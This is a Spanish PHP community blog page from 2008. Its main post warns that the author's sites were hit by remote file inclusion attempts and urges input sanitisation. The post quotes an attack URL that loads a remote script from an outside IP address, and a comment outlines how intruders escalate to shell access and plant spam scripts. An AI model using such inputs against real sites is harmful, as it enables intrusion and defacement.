Archivos

Última frikada hace 11 mess, 3 semanas

programadorphp : ésta es otra web para contratar personal: «link»
zenphp : La versión 0.1.1 de zenphp ha sido liberada!
friki_8541 : Feliz año!!
juaxix : Tranquilo, iré sacando manuales con vídeos y muchos tutoriales, en la web, www.zenphp.es
PABLOKO : me tienes que enseñar zenphp, no lo conozco y me gustaria verlo y trabajar un pokito aver
juaxix : Los paradigmas de programación son más fáciles de llevar con POO pero no sólo para ésto sirve,además ayuda a salvarte la vida, puedes crear una web completa reutilizando código con un buen sistema de (jerarquía) objetos...eso es el SDK de zenphp.es precisamente...un conjunto de objetos generales que te ayudan a construir toda una aplicación web en apenas unas líneas (sin contar el HTML externo)
pabloko : ummm, los objetos, quieras o no, me la pelan. no suelo usarlos, y nose quien puede tener necesidad de usarlos, al fin y al cabo, yo hago scripts para un objetivo. si he de hacer 1000 lineas de codigo para algo que podria resumir en 100 o 200 y a cambio solo me diese problemas a la hora de configurar aspectos para mastrarlo en diferentes instancias, me lo pensaria bastante, que si lo que queremos es programar friki siempre podemos 100110101011110101010011001 jejej ciao 1010111
zenphpero : Hombre, PHP5 también tiene el soporte tan esperado para tantas cosas y toda la parafernalia de un lenguaje orientado a objetos como dios manda XD no?
pabloko : odio PHP5 tendra mas funciones para clases y xml y todo eso pero internamente eliminan todas esas funciones rara y tyan frikis que yo usaba como el soporte de lotus_notes etc etc
Versionado : Lo último que he puesto es para comprobar que la versión que hay instalada de PHP en el servidor, es menor que la 5
Versionado : if ( version_compare( phpversion(), '5', '<' ) )
juaxix : Akismet como que no funciona muy bien ,necesita acceso a internet ,...internamente ...cosa q mi server no permite :O
pabloko : mmm ke mamada vamos a tener que meter captchas asta en los tags a donde hemos llegao, juan pon akismet
juaxix : Por cierto Pabloko, revisa tus posts, porque igual aparecen caracteres extraños con ésta nueva versión de wordpress y este tema...
juaxix : si pero no se como voy a quitar todos los enlaces estos de los spammers...
pabloko : estilazo en la web, muy chulo
juaxix : no se si os interesará más los trucos q las clases en PHP o si necesitais el código en PHP en lugar del coloreado que hay actualmente en la página...
hhKaoS : esa gente de la etsi2 xD. Me gustaría contactar cn quien/s sea/is un saludo. KaoS (hhkaos@gmail.com)
juaxix : Pues ya estamos posteando contenidos interesantes...realizad vuestras peticiones
friki_7824 : igual han colgao el wp con el fantastico! menudos petardos
friki_6591 : jajaa, ok, empezaremos a postear las clases ,pero alguien sabe de un módulo para WordPress que tenga coloración de código fuente en PHP?
friki_6284 : anda que vaya panda de frikissss. A ver si empezais a progrmar algo en PHP ya....
Juax : Deja aki una frikada como el buen friki que eres!!

Debes registrarte para poder participar en ésta caja de frikadas inmediatas!

Freakies en el sitio

· Online:1
· Hoy: 11
· Media:28
· Clicks: 43
· Media de clicks:56

Limpiando entradas de datos de usuario en OsCommerce »

« Ayuda con cadenas de texto

XSS : Ataques spam mediante scripts PHP en una url

Escrito el 02/June/2008 por juan_belon

He recibido más ataques en los dominios de los que soy responsable,…esta vez usando un ataque de esta forma

index.php?com=http://207.234.200.112/css/style/style.txt?contacto

intentan colar un script para subir ficheros…dentro de una variable…

tenedlo en cuenta, parsear bien las entradas! $_GET, $_POST, etc.

Hacking

Seguir las respuestas con el canal RSS 2.0 para ello. Puedes dejar un comentario, o trackback copiar a tu sitio.

3 Conversaciones to “XSS : Ataques spam mediante scripts PHP en una url”

pabloko on August 25th, 2008 at 5:30
Hola tios,

pabloko on August 25th, 2008 at 5:36
Hola tios, el defacing es un problema muy extendido, cuando se logra ejcutar un programa hay muchos archivos por ahi para tener acceso total ftp, sql, incluso shell access o posibilidad de infectar con troyanos el server para controlarlo (suelen sr perl aunqu los scripts suelen ser php) tambien he encontrado casos que usaban un script para enviar spam, lo sueln enmascarar poniendo codigo en archivos y poniendo en los msj cosas de phpbb para despistar, un rollo, aconsejo cambiar el php.ini para no permitir accesos externos o mimar la programacion, una vez dentro te suelen ponr en todas las paginas una lista de enlaces que putea tu web y te jod en google. si os pasa hay un post donde explico como eliminar toda esa mierda.

Caña a zenphp juan!

un saludo

juan_belon on September 3rd, 2008 at 12:43
Caña caña…en zenphp evito lo que suele pasar…que es encontrarse con código mal escrito por parte de otro programador, que toma por evidente que un servidor usará magic quotes por ejemplo, y esa es su estrategia para evitar SQL Injection…aaaaihiii XD
asi no se puede trabajar
jajaja

Para decir algo pulsa aquí

Debes de acceder para poder comentar.

Granada PHP

Subscríbete

Enlaces actualizados

Categorías